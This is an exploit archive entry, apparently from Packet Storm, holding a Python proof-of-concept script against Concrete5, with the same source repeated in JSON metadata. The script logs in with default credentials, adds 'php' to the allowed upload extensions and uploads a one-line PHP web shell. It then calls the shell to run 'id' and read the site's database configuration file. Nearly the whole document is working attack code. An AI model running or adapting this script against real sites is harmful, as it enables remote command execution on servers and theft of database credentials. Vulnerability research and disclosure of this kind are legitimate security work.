ID PACKETSTORM:142732
Type packetstorm
Reporter Cody Sixteen
Modified 2017-05-28T00:00:00
Description
`c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
#!/usr/bin/env python
# shell-concrete5.py - module based on previous version
# created 29.04.2017. Bug ('feature') is exploitable only
# when you will have a valid credentials.
import sys
import re
import requests
target = raw_input("[+] Hostname> ")
logMe = target + '/index.php/login'
session = requests.session()
initreq = session.get(logMe)
initresp = initreq.text
gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
found = re.search(gettoken, initresp)
if found:
token = found.group(1)
print '[+] Found token: ' + str(token)
# assuming token is valid, let's log in
login_data = {
'uName':'user',
'uPassword':'bitnami',
'ccm_token':token
}
loglink = target + '/index.php/login/authenticate/concrete'
loginreq = session.post(loglink, data=login_data)
#afterlogin = target + '/index.php/dashboard/system'
afterlogin = target + '/index.php/dashboard/system/files/filetypes'
nextreq1 = session.get(afterlogin)
nextresp1 = nextreq1.text
print '[+] Cool, we\'re logged-in!'
#print afterlogin
#print nextresp1
print '[+] We are ready to go, extension-page is available.'
print ''
# construct POST with new.ext
newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
foundToken = re.search(newToken, nextresp1)
if foundToken:
newOne = foundToken.group(1)
print '[+] New token grabbed: ' + str(newOne)
data_ext = {
'ccm_token':newOne,
'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'
}
datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
datareq = session.post(datalink, data=data_ext)
dataresp = datareq.text
nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>')
newexts = re.search(nowwecan, dataresp)
if newexts:
print '[+] Available now: '+ newexts.group(1)
print '[+] Time to upload shell...'
# next token to upload request
nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
tokreq3 = session.get(nextTokenUrl)
tokresp3 = tokreq3.text
grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
foundit = re.search(grabNextTok, tokresp3)
if foundit:
tokentoup = foundit.group(1)
print '[+] Next token (3rd): ' + str( tokentoup )
# we are logged-in; preparing req to upload shell
saymyname = 'meshell3.php'
fp = open(saymyname,'w')
fp.write('<?php system($_GET["xx"]);')
fp.close()
# tmpshfile ready, do req now
up_files = { 'file':open(saymyname,'rb') }
up_params = {
'ccm_token':tokentoup,
'filename':saymyname,
'currentFolder':'0'
}
upreqlink = target + '/index.php/ccm/system/file/upload'
upreqnow = session.post(upreqlink, files=up_files, data=up_params)
upresp = upreqnow.text
if saymyname in upresp:
print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'
searchme = target + '/index.php/dashboard/files/search'
dosearch = session.get(searchme)
meresp = dosearch.text
searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')
foundShLink = re.search(searchShLink, meresp)
if foundShLink:
foundId = foundShLink.group(3)
shid = foundId.strip('\/')
print '[+] Found link ID:' + str(shid)
preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)
prepreq = session.get(preparingProp)
prepresp = prepreq.text
whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">'
whereareu = re.compile(whereareutxt)
foundme2 = re.search(whereareu, prepresp)
if foundme2:
print '[+] Shell is ready to use:'
shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
print ' ' + shellshere
print '[+] "Finish him!" ;7'
finish = session.get(shellshere)
fintxt = finish.text
print '[+] Response:'
print fintxt
print '\n---------------'
else:
print '[-] I can not upload our shell. Verify!'
`
{"sourceHref": "https://packetstormsecurity.com/files/download/142732/shell-concrete5.py.txt", "bulletinFamily": "exploit", "viewCount": 5, "reporter": "Cody Sixteen", "references": [], "description": "", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "e03cab513d82861f98dea07ebc90b363"}, {"key": "modified", "hash": "a279e4983bfdaaece0aa0914d04d0170"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a279e4983bfdaaece0aa0914d04d0170"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "0d379c541d1ab6f9918c9739cfec61c6"}, {"key": "sourceData", "hash": "22501d010a4567651a4ae484ca5623e1"}, {"key": "sourceHref", "hash": "a6b33c6016998c0755c28bfd24793936"}, {"key": "title", "hash": "157a45cd5b17e90f821de150b018d9af"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "href": "https://packetstormsecurity.com/files/142732/Concrete5-Proof-Of-Concept-Shell-Upload.html", "modified": "2017-05-28T00:00:00", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "id": "PACKETSTORM:142732", "title": "Concrete5 Proof Of Concept Shell Upload", "hash": "051a3ac247119affe92df3d2befed44c577947c3848899ca12c1bd1a50a3c60d", "edition": 1, "published": "2017-05-28T00:00:00", "type": "packetstorm", "history": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvelist": [], "lastseen": "2017-05-31T13:20:10", "sourceData": "`c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py \n#!/usr/bin/env python \n# shell-concrete5.py - module based on previous version \n# created 29.04.2017. Bug ('feature') is exploitable only \n# when you will have a valid credentials. \nimport sys \nimport re \nimport requests \n \ntarget = raw_input(\"[+] Hostname> \") \nlogMe = target + '/index.php/login' \nsession = requests.session() \n \ninitreq = session.get(logMe) \ninitresp = initreq.text \n \ngettoken = re.compile('<input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfound = re.search(gettoken, initresp) \n \nif found: \ntoken = found.group(1) \nprint '[+] Found token: ' + str(token) \n \n \n# assuming token is valid, let's log in \nlogin_data = { \n'uName':'user', \n'uPassword':'bitnami', \n'ccm_token':token \n} \nloglink = target + '/index.php/login/authenticate/concrete' \nloginreq = session.post(loglink, data=login_data) \n \n#afterlogin = target + '/index.php/dashboard/system' \nafterlogin = target + '/index.php/dashboard/system/files/filetypes' \nnextreq1 = session.get(afterlogin) \nnextresp1 = nextreq1.text \nprint '[+] Cool, we\\'re logged-in!' \n#print afterlogin \n#print nextresp1 \nprint '[+] We are ready to go, extension-page is available.' \nprint '' \n \n# construct POST with new.ext \nnewToken = re.compile('<input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfoundToken = re.search(newToken, nextresp1) \n \nif foundToken: \nnewOne = foundToken.group(1) \nprint '[+] New token grabbed: ' + str(newOne) \n \ndata_ext = { \n'ccm_token':newOne, \n'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone' \n} \ndatalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions' \ndatareq = session.post(datalink, data=data_ext) \ndataresp = datareq.text \nnowwecan = re.compile('file-access-file-types\" class=\"form-control\" rows=\"3\">(.*?)</textarea>') \nnewexts = re.search(nowwecan, dataresp) \n \nif newexts: \nprint '[+] Available now: '+ newexts.group(1) \n \nprint '[+] Time to upload shell...' \n \n# next token to upload request \nnextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0' \ntokreq3 = session.get(nextTokenUrl) \ntokresp3 = tokreq3.text \n \ngrabNextTok = re.compile('input type=\"hidden\" name=\"ccm_token\" value=\"(.*?)\"/>') \nfoundit = re.search(grabNextTok, tokresp3) \n \nif foundit: \ntokentoup = foundit.group(1) \nprint '[+] Next token (3rd): ' + str( tokentoup ) \n \n# we are logged-in; preparing req to upload shell \nsaymyname = 'meshell3.php' \n \nfp = open(saymyname,'w') \nfp.write('<?php system($_GET[\"xx\"]);') \nfp.close() \n \n# tmpshfile ready, do req now \nup_files = { 'file':open(saymyname,'rb') } \n \nup_params = { \n'ccm_token':tokentoup, \n'filename':saymyname, \n'currentFolder':'0' \n} \nupreqlink = target + '/index.php/ccm/system/file/upload' \nupreqnow = session.post(upreqlink, files=up_files, data=up_params) \nupresp = upreqnow.text \nif saymyname in upresp: \nprint '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')' \n \nsearchme = target + '/index.php/dashboard/files/search' \ndosearch = session.get(searchme) \nmeresp = dosearch.text \n \nsearchShLink = re.compile(saymyname+'\",\"urlInline\":\"http:(.*?)download_file(.*?)view_inline(.*?)\",\"urlDownload\":') \nfoundShLink = re.search(searchShLink, meresp) \n \nif foundShLink: \nfoundId = foundShLink.group(3) \nshid = foundId.strip('\\/') \nprint '[+] Found link ID:' + str(shid) \n \npreparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid) \nprepreq = session.get(preparingProp) \nprepresp = prepreq.text \nwhereareutxt = '<a target=\"_blank\" href=\"(.*?)/application/files/(.*?)' + saymyname +'\">' \nwhereareu = re.compile(whereareutxt) \nfoundme2 = re.search(whereareu, prepresp) \n \nif foundme2: \nprint '[+] Shell is ready to use:' \nshellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id' \nprint ' ' + shellshere \n \nprint '[+] \"Finish him!\" ;7' \nfinish = session.get(shellshere) \nfintxt = finish.text \nprint '[+] Response:' \nprint fintxt \nprint '\\n---------------' \n \nelse: \nprint '[-] I can not upload our shell. Verify!' \n \n`\n"}
{}
